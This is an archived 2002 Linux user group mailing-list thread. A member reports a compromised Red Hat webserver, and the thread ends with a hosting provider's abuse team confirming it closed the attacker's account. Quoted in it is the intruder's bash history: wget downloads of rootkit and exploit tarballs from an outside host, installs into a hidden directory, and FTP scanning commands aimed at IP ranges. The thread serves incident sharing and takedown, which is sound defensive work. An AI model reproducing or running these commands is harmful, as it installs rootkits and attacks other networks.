[Fwd: RE:Fwd: Compromised Linux Box [#7826335]] (Response from hypermart.net)


Subject: [Fwd: RE:Fwd: Compromised Linux Box [#7826335]] (Response from hypermart.net)
From: Buddha (buddha@gci.net)
Date: Tue Apr 23 2002 - 18:47:03 AKDT


Thought the group might be interested in this response from hypermart.net
after I took it upon myself to forward the info that Alan posted. One less
resource for that black hat to use against us.

-Buddha

-------- Original Message --------
Subject: RE:Fwd: Compromised Linux Box [#7826335]
From: abuse@hypermart.net
Date: Tue, April 23, 2002 1:09 pm
To: buddha@gci.net

Hello,

Thanks for the information! We've closed this account.

Thank you for contacting our customer service group. Please let us know
if there is anything we can do to help you in the future.

Do you have a comment or suggestion? If so, we would be glad to hear it.
Please forward your thoughts and ideas to feedback@hypermart.net.

Jesse

--Original Message--

Hello,

I belong to a Linux mail list and this one came over the wire today. I
think you should have a look at what's contained in the
http://cage.hypermart.net site as it looks like a bunch of hacker tools.

Thanx,
-Jim "Buddha" McMorris

-------- Original Message --------
Subject: Compromised Linux Box
From: Alan Caruth <saono@artificiallives.com>
Date: Mon, April 22, 2002 2:18 pm
To: aklug@aklug.org

Hello all,
        A coworker has a webserver running on his home network which has a
        fairly default redhat install on it. He opened up FTP without
thinking
        and within a short timeframe he found that he had been compromised.
The
        person didn't clean out any logs or after he was done so it was
fairly
        easy to track what he did.

I figured y'all might like to see the bash_history on this one. From what
my coworker has said so far after looking at his other logs the attack
came from an asian nation IP address. The person who hacked the machine
has bunches of files on his website in case anyone is interested in
finding out what all he did (or might do) in any more detail.

---bash_history on
wget
wget cage.hypermart.net/LchRk.tgz
tar zxvf LchRk.tgz
cd cage
..../fuckit
rm -rf LchRk.tgz
rm -rf cage
wget cage.hypermart.net/cage.tgz
tar zxvf cage.tgz
cd cage
..../install
cd /usr/bin/".. "
ls
wget cage.hypermart.net/3rwu2.tgz
tar zxvf 3rwu2.tgz
rm -rf 3rwu2.tgz
..../startwu 199.112.0.0 21
..../startwu 128.12.0.0 21
..../startwu 128.12.100.0 21
..../startwu 128.12.154.0 21
..../startwu 128.95.0.0 21

--bash history off

Have a good one.
-Alan Caruth

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.



This archive was generated by hypermail 2a23 : Tue Apr 23 2002 - 18:43:51 AKDT